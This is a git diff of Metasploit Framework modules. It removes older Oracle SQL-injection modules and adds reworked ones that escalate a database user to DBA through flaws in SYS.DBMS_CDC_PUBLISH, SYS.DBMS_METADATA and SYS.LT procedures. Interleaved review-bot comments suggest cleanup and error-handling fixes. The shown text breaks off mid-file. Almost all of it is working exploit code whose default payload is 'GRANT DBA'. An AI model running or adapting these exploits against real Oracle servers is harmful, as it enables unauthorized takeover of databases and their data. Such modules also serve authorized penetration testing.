diff --git a/modules/auxiliary/admin/oracle/dbms_cdc_ipublish.rb b/modules/auxiliary/admin/oracle/dbms_cdc_ipublish.rb
deleted file mode 100644
index 2748e80a9f..0000000000
--- a/modules/auxiliary/admin/oracle/dbms_cdc_ipublish.rb
+++ /dev/null
@@ -1,80 +0,0 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::FILEFORMAT - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_CHANGE_SOURCE.', - 'Description' => %q{ - This module exploits an sql injection flaw in the ALTER_HOTLOG_INTERNAL_CSOURCE - procedure of the PL/SQL package DBMS_CDC_IPUBLISH. Any user with execute - privilege on the vulnerable package can exploit this vulnerability. - }, - 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE', '2008-3996' ], - [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ], - ], - 'DisclosureDate' => 'Oct 22 2008')) - - register_options( - [ - OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT']), - OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']), - OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']), - ], self.class) - end - - def run - - name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - - function = %Q| - CREATE OR REPLACE FUNCTION #{name} - RETURN VARCHAR2 AUTHID CURRENT_USER - IS - PRAGMA AUTONOMOUS_TRANSACTION; - BEGIN EXECUTE IMMEDIATE '#{datastore['SQL']}'; - COMMIT; - RETURN NULL; - END; - | - - package = "BEGIN SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE('''||'||user||'.#{name}||''');END;" - - uno = Rex::Text.encode_base64(function) - dos = Rex::Text.encode_base64(package) - - sql = %Q| - DECLARE - #{rand1} VARCHAR2(32767); - #{rand2} 
VARCHAR2(32767); - BEGIN - #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}'))); - EXECUTE IMMEDIATE #{rand1}; - #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}'))); - EXECUTE IMMEDIATE #{rand2}; - END; - / - DROP FUNCTION #{name}; - | - - print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(sql) - end - -end diff --git a/modules/auxiliary/admin/oracle/dbms_cdc_publish.rb b/modules/auxiliary/admin/oracle/dbms_cdc_publish.rb deleted file mode 100644 index 196af14ce2..0000000000 --- a/modules/auxiliary/admin/oracle/dbms_cdc_publish.rb +++ /dev/null 
@@ -1,80 +0,0 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::FILEFORMAT - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'SQL Injection via SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE.', - 'Description' => %q{ - This module exploits an sql injection flaw in the ALTER_AUTOLOG_CHANGE_SOURCE - procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute - privilege on the vulnerable package can exploit this vulnerability. - }, - 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE', '2008-3995' ], - [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ], - ], - 'DisclosureDate' => 'Oct 22 2008')) - - register_options( - [ - OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT']), - OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']), - OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']), - ], self.class) - end - - def run - - name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - - function = %Q| - CREATE OR REPLACE FUNCTION #{name} - RETURN VARCHAR2 AUTHID CURRENT_USER - IS - PRAGMA AUTONOMOUS_TRANSACTION; - BEGIN EXECUTE IMMEDIATE '#{datastore['SQL']}'; - COMMIT; - RETURN NULL; - END; - | - - package = "BEGIN SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE('''||'||user||'.#{name}||''');END;" - - uno = Rex::Text.encode_base64(function) - dos = Rex::Text.encode_base64(package) - - sql = %Q| - DECLARE - #{rand1} VARCHAR2(32767); - #{rand2} VARCHAR2(32767); - 
BEGIN - #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}'))); - EXECUTE IMMEDIATE #{rand1}; - #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}'))); - EXECUTE IMMEDIATE #{rand2}; - END; - / - DROP FUNCTION #{name}; - | - - print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(sql) - end - -end diff --git a/modules/auxiliary/admin/oracle/lt_mergeworkspace.rb b/modules/auxiliary/admin/oracle/lt_mergeworkspace.rb deleted file mode 100644 index dc9d851ef8..0000000000 --- a/modules/auxiliary/admin/oracle/lt_mergeworkspace.rb +++ /dev/null 
@@ -1,101 +0,0 @@ -## -# $Id: lt_MERGEWORKSPACE.rb -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::FILEFORMAT - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'SQL Injection in SYS.LT.MERGEWORKSPACE Procedure.', - 'Description' => %q{ - This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in - SYS.LT.MERGEWORKSPACE procedure. - }, - 'Author' => [ 'Sh2kerr ' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE', '2008-3983' ], - [ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml' ], - ], - 'DisclosureDate' => 'Jan 13 2009')) - - register_options( - [ - OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT']), - OptString.new('USER', [ false, 'The current user. 
', 'SCOTT']), - OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']), - OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']), - - ], self.class) - end - - def run - name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - - function = %Q| - - CREATE OR REPLACE FUNCTION #{name} return varchar2 - authid current_user AS - pragma autonomous_transaction; - BEGIN - EXECUTE IMMEDIATE '#{datastore['SQL']}'; - COMMIT; - RETURN 'X'; - END; - | - - - - prepare ="BEGIN SYS.LT.CREATEWORKSPACE('X'' and #{datastore['USER']}.#{name}()=''X');END;" - - exploiting ="BEGIN SYS.LT.MERGEWORKSPACE('X'' and #{datastore['USER']}.#{name}()=''X');END;" - - - fun = Rex::Text.encode_base64(function) - prp = Rex::Text.encode_base64(prepare) - exp = Rex::Text.encode_base64(exploiting) - - - sql = %Q| - DECLARE - #{rand1} VARCHAR2(32767); - #{rand2} VARCHAR2(32767); - #{rand3} VARCHAR2(32767); - BEGIN - #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{fun}'))); - EXECUTE IMMEDIATE #{rand1}; - EXECUTE IMMEDIATE 'GRANT EXECUTE ON #{name} TO PUBLIC'; - #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp}'))); - EXECUTE IMMEDIATE #{rand2}; - #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp}'))); - EXECUTE IMMEDIATE #{rand3}; - END; - / - DROP FUNCTION #{name}; - | - - - print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(sql) - - - end - -end \ No newline at end of file diff --git a/modules/auxiliary/admin/oracle/lt_removeworkspace.rb b/modules/auxiliary/admin/oracle/lt_removeworkspace.rb deleted file mode 100644 index 0951fbb50b..0000000000 --- a/modules/auxiliary/admin/oracle/lt_removeworkspace.rb +++ /dev/null 
@@ -1,101 +0,0 @@ -## -# $Id: lt_REMOVEWORKSPACE.rb -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::FILEFORMAT - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'SQL Injection in SYS.LT.REMOVEWORKSPACE Procedure.', - 'Description' => %q{ - This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in - SYS.LT.REMOVEWORKSPACE procedure. - }, - 'Author' => [ 'Sh2kerr ' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE', '2008-3984' ], - [ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml' ], - ], - 'DisclosureDate' => 'Jan 13 2009')) - - register_options( - [ - OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT']), - OptString.new('USER', [ false, 'The current user. 
', 'SCOTT']), - OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']), - OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']), - - ], self.class) - end - - def run - name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - - function = %Q| - - CREATE OR REPLACE FUNCTION #{name} return varchar2 - authid current_user AS - pragma autonomous_transaction; - BEGIN - EXECUTE IMMEDIATE '#{datastore['SQL']}'; - COMMIT; - RETURN 'X'; - END; - | - - - - prepare ="BEGIN SYS.LT.CREATEWORKSPACE('X'' and #{datastore['USER']}.#{name}()=''X');END;" - - exploiting ="BEGIN SYS.LT.REMOVEWORKSPACE('X'' and #{datastore['USER']}.#{name}()=''X');END;" - - - fun = Rex::Text.encode_base64(function) - prp = Rex::Text.encode_base64(prepare) - exp = Rex::Text.encode_base64(exploiting) - - - sql = %Q| - DECLARE - #{rand1} VARCHAR2(32767); - #{rand2} VARCHAR2(32767); - #{rand3} VARCHAR2(32767); - BEGIN - #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{fun}'))); - EXECUTE IMMEDIATE #{rand1}; - EXECUTE IMMEDIATE 'GRANT EXECUTE ON #{name} TO PUBLIC'; - #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp}'))); - EXECUTE IMMEDIATE #{rand2}; - #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp}'))); - EXECUTE IMMEDIATE #{rand3}; - END; - / - DROP FUNCTION #{name}; - | - - - print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(sql) - - - end - -end \ No newline at end of file diff --git a/modules/auxiliary/admin/oracle/lt_rollbackworkspace.rb b/modules/auxiliary/admin/oracle/lt_rollbackworkspace.rb deleted file mode 100644 index f6a488bd8b..0000000000 --- a/modules/auxiliary/admin/oracle/lt_rollbackworkspace.rb +++ /dev/null 
@@ -1,88 +0,0 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::FILEFORMAT - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'SQL Injection in SYS.LT.ROLLBACKWORKSPACE Procedure.', - 'Description' => %q{ - This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in - SYS.LT.ROLLBACKWORKSPACE procedure. Tested on Oracle 10g R1. - }, - 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE', '2009-0978' ], - [ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2009-03.shtml' ], - ], - 'DisclosureDate' => 'May 4 2009')) - - register_options( - [ - OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT']), - OptString.new('USER', [ false, 'The current user. 
', 'SCOTT']), - OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']), - OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']), - - ], self.class) - end - - def run - name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - ws = Rex::Text.rand_text_alpha_upper(rand(5) + 1) - - function = %Q| - CREATE OR REPLACE FUNCTION #{name} return varchar2 - authid current_user AS - pragma autonomous_transaction; - BEGIN - EXECUTE IMMEDIATE '#{datastore['SQL']}'; - COMMIT; - RETURN '#{ws}'; - END; - | - - prepare = "BEGIN SYS.LT.CREATEWORKSPACE('#{ws}'' and #{datastore['USER']}.#{name}()=''#{ws}');END;" - - exploiting = "BEGIN SYS.LT.ROLLBACKWORKSPACE('#{ws}'' and #{datastore['USER']}.#{name}()=''#{ws}');END;" - - fun = Rex::Text.encode_base64(function) - prp = Rex::Text.encode_base64(prepare) - exp = Rex::Text.encode_base64(exploiting) - - sql = %Q| - DECLARE - #{rand1} VARCHAR2(32767); - #{rand2} VARCHAR2(32767); - #{rand3} VARCHAR2(32767); - BEGIN - #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{fun}'))); - EXECUTE IMMEDIATE #{rand1}; - EXECUTE IMMEDIATE 'GRANT EXECUTE ON #{name} TO PUBLIC'; - #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp}'))); - EXECUTE IMMEDIATE #{rand2}; - #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp}'))); - EXECUTE IMMEDIATE #{rand3}; - END; - / - DROP FUNCTION #{name}; - | - - print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(sql) - end -end diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb new file mode 100644 index 0000000000..9db7f0e76e --- /dev/null +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb 
@@ -0,0 +1,75 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::ORACLE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE', + 'Description' => %q{ + The module exploits an sql injection flaw in the ALTER_HOTLOG_INTERNAL_CSOURCE + procedure of the PL/SQL package DBMS_CDC_IPUBLISH. Any user with execute privilege + on the vulnerable package can exploit this vulnerability. By default, users granted + EXECUTE_CATALOG_ROLE have the required privilege. Affected versions: Oracle Database + Server versions 10gR1, 10gR2 and 11gR1. Fixed with October 2008 CPU. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'CVE', '2008-3996' ], + [ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-08.shtml'], + ], + 'DisclosureDate' => 'Oct 22 2008')) + + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), + ], self.class) + end + + + def run + name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + + function = " + CREATE OR REPLACE FUNCTION #{name} + RETURN VARCHAR2 AUTHID CURRENT_USER + IS + PRAGMA AUTONOMOUS_TRANSACTION; + BEGIN + EXECUTE IMMEDIATE '#{datastore['SQL']}'; + COMMIT; + RETURN NULL; + END;" + + package = " + BEGIN + SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE('''||'||user||'.#{name}||''');END;" + + clean = "DROP FUNCTION #{name}" + + begin + print_status("Sending function...") + prepare_exec(function) + rescue => e + return + end + + print_status("Attempting sql injection on SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE...") + 
prepare_exec(package) + + print_status("Done! Removing function '#{name}'...") + prepare_exec(clean) + end + +end diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb new file mode 100644 index 0000000000..34a82231c1 --- /dev/null +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb 
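Review bot: `prepare_exec(clean)` only runs when the injection call succeeds, so an exception raised by `prepare_exec(package)` leaves the helper function `#{name}` behind on the server; once the CREATE FUNCTION has gone through, the DROP belongs in an `ensure`. The `rescue => e` around the first `prepare_exec` also discards `e` and returns silently, so a failed CREATE FUNCTION looks exactly like a clean exit — a `print_error` before the `return` makes it diagnosable. Separately, the `SQL` default `"GRANT DBA TO #{datastore['DBUSER']}"` is interpolated once inside `initialize`, so a later `set DBUSER` does not change the default statement. The same three points apply to the new dbms_cdc_publish.rb, dbms_metadata_get_granted_xml.rb, dbms_metadata_get_xml.rb, dbms_metadata_open.rb, lt_compressworkspace.rb, lt_mergeworkspace.rb and lt_removeworkspace.rb hunks.
```ruby
# … unchanged: name / function / package / clean setup …
print_status("Sending function...")
begin
  prepare_exec(function)
rescue => e
  print_error("Failed to create function '#{name}': #{e}")
  return
end

begin
  print_status("Attempting sql injection on SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE...")
  prepare_exec(package)
ensure
  print_status("Done! Removing function '#{name}'...")
  prepare_exec(clean)
end
```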
@@ -0,0 +1,79 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::ORACLE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SQL Injection via SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE', + 'Description' => %q{ + The module exploits an sql injection flaw in the ALTER_AUTOLOG_CHANGE_SOURCE + procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege + on the vulnerable package can exploit this vulnerability. By default, users granted + EXECUTE_CATALOG_ROLE have the required privilege. + Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1. + Fixed with October 2008 CPU. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'CVE', '2008-3995' ], + [ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-09.shtml' ], + ], + 'DisclosureDate' => 'Oct 22 2008')) + + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), + ], self.class) + end + + def run + c = connect + name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + + function = " + CREATE OR REPLACE FUNCTION #{name} + RETURN VARCHAR2 AUTHID CURRENT_USER + IS + PRAGMA AUTONOMOUS_TRANSACTION; + BEGIN + EXECUTE IMMEDIATE '#{datastore['SQL']}'; + COMMIT; + RETURN NULL; + END;" + + package = " + BEGIN + SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE('''||'||user||'.#{name}||'''); + END; + " + + clean = "DROP FUNCTION #{name}" + + begin + print_status("Sending function...") + prepare_exec(function) + rescue => e + return + end + print_status("Attempting sql injection on SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE...") + 
prepare_exec(package) + + print_status("Done! Removing function '#{name}'...") + prepare_exec(clean) + + c.disconnect + end + +end diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb new file mode 100644 index 0000000000..7eae7c89c2 --- /dev/null +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb 
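Review bot: `c.disconnect` is skipped on every error path: the `return` inside `rescue => e` and any exception from `prepare_exec(package)` or `prepare_exec(clean)` all leave the connection opened by `c = connect` dangling. Either move the disconnect into an `ensure` on `run` (`ensure` / `c.disconnect if c`), or drop the explicit `connect`/`disconnect` pair — none of the sibling modules in this commit call `connect` before `prepare_exec`, which suggests the ORACLE mixin manages the session itself; worth confirming against Msf::Exploit::ORACLE before choosing.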
@@ -0,0 +1,67 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::ORACLE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML.', + 'Description' => %q{ + This module will escalate a Oracle DB user to DBA by exploiting an sql injection + bug in the SYS.DBMS_METADATA.GET_GRANTED_XML package/function. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'URL', 'http://www.metasploit.com' ], + ], + 'DisclosureDate' => 'Jan 5 2008')) + + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), + ], self.class) + end + + def run + name = Rex::Text.rand_text_alpha(rand(10) + 1) + + function = " + create or replace function #{datastore['DBUSER']}.#{name} return varchar2 + authid current_user is pragma autonomous_transaction; + begin + execute immediate '#{datastore['SQL']}'; + return ''; + end; + " + + package = "select sys.dbms_metadata.get_granted_xml('''||#{datastore['DBUSER']}.#{name}()||''') from dual" + + clean = "drop function #{name}" + + begin + print_status("Sending function...") + prepare_exec(function) + rescue => e + return + end + + print_status("Attempting sql injection on SYS.DBMS_METADATA.GET_GRANTED_XML...") + prepare_exec(package) + + print_status("Removing function '#{name}'...") + prepare_exec(clean) + + end + +end diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb new file mode 100644 index 0000000000..89e03d6f26 --- /dev/null +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb 
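Review bot: The `'References'` entry `[ 'URL', 'http://www.metasploit.com' ]` is a stand-in that points at nothing specific; this module, dbms_metadata_get_xml.rb and dbms_metadata_open.rb ship with no advisory, CVE or vendor-patch reference at all, while the deleted admin/oracle modules and the other new ones each carry one. Replace it with the actual advisory for the DBMS_METADATA issue, or remove the entry rather than keep a placeholder URL. The `clean` statement `drop function #{name}` is also unqualified while the function was created as `#{datastore['DBUSER']}.#{name}`; the two only match when DBUSER is the connecting user's own schema, so qualifying the DROP the same way keeps them consistent.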
@@ -0,0 +1,67 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::ORACLE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SQL Injection via SYS.DBMS_METADATA.GET_XML.', + 'Description' => %q{ + This module will escalate a Oracle DB user to DBA by exploiting an sql injection + bug in the SYS.DBMS_METADATA.GET_XML package/function. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'URL', 'http://www.metasploit.com' ], + ], + 'DisclosureDate' => 'Jan 5 2008')) + + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), + ], self.class) + end + + def run + name = Rex::Text.rand_text_alpha(rand(10) + 1) + + function = " + create or replace function #{datastore['DBUSER']}.#{name} return varchar2 + authid current_user is pragma autonomous_transaction; + begin + execute immediate '#{datastore['SQL']}'; + return ''; + end; + " + + package = "select sys.dbms_metadata.get_xml('''||#{datastore['DBUSER']}.#{name}()||''','') from dual" + + clean = "drop function #{name}" + + begin + print_status("Sending function...") + prepare_exec(function) + rescue => e + return + end + + print_status("Attempting sql injection on SYS.DBMS_METADATA.GET_XML...") + prepare_exec(package) + + print_status("Removing function '#{name}'...") + prepare_exec(clean) + + end + +end diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb new file mode 100644 index 0000000000..a4797633af --- /dev/null +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb 
@@ -0,0 +1,67 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::ORACLE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SQL Injection via SYS.DBMS_METADATA.OPEN.', + 'Description' => %q{ + This module will escalate a Oracle DB user to DBA by exploiting an sql injection + bug in the SYS.DBMS_METADATA.OPEN package/function. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'URL', 'http://www.metasploit.com' ], + ], + 'DisclosureDate' => 'Jan 5 2008')) + + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), + ], self.class) + end + + def run + name = Rex::Text.rand_text_alpha(rand(10) + 1) + + function = " + create or replace function #{datastore['DBUSER']}.#{name} return varchar2 + authid current_user is pragma autonomous_transaction; + begin + execute immediate '#{datastore['SQL']}'; + return ''; + end; + " + + package = "select sys.dbms_metadata.open('''||#{datastore['DBUSER']}.#{name}()||''') from dual" + + clean = "drop function #{name}" + + begin + print_status("Sending function...") + prepare_exec(function) + rescue => e + return + end + + print_status("Attempting sql injection on SYS.DBMS_METADATA.OPEN...") + prepare_exec(package) + + print_status("Removing function '#{name}'...") + prepare_exec(clean) + + end + +end diff --git a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb new file mode 100644 index 0000000000..64c8cecb81 --- /dev/null +++ b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb 
@@ -0,0 +1,73 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::ORACLE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SQL Injection via SYS.LT.COMPRESSWORKSPACE.', + 'Description' => %q{ + This module exploits an sql injection flaw in the COMPRESSWORKSPACE + procedure of the PL/SQL package SYS.LT. Any user with execute + privilege on the vulnerable package can exploit this vulnerability. + }, + 'Author' => [ 'CG' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ], + [ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml' ], + ], + 'DisclosureDate' => 'Nov 11, 2008')) + + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), + ], self.class) + end + + def run + name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + cruft = Rex::Text.rand_text_alpha_upper(1) + + function = " + CREATE OR REPLACE FUNCTION #{cruft} + RETURN VARCHAR2 AUTHID CURRENT_USER + AS + PRAGMA AUTONOMOUS_TRANSACTION; + BEGIN + EXECUTE IMMEDIATE '#{datastore['SQL']}'; + COMMIT; + RETURN '#{cruft}'; + END;" + + package1 = "BEGIN SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;" + + package2 = "BEGIN SYS.LT.COMPRESSWORKSPACETREE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;" + + clean = "DROP FUNCTION #{cruft}" + + print_status("Attempting sql injection on SYS.LT.COMPRESSWORKSPACE...") + begin + print_status("Sending function...") + prepare_exec(function) + rescue 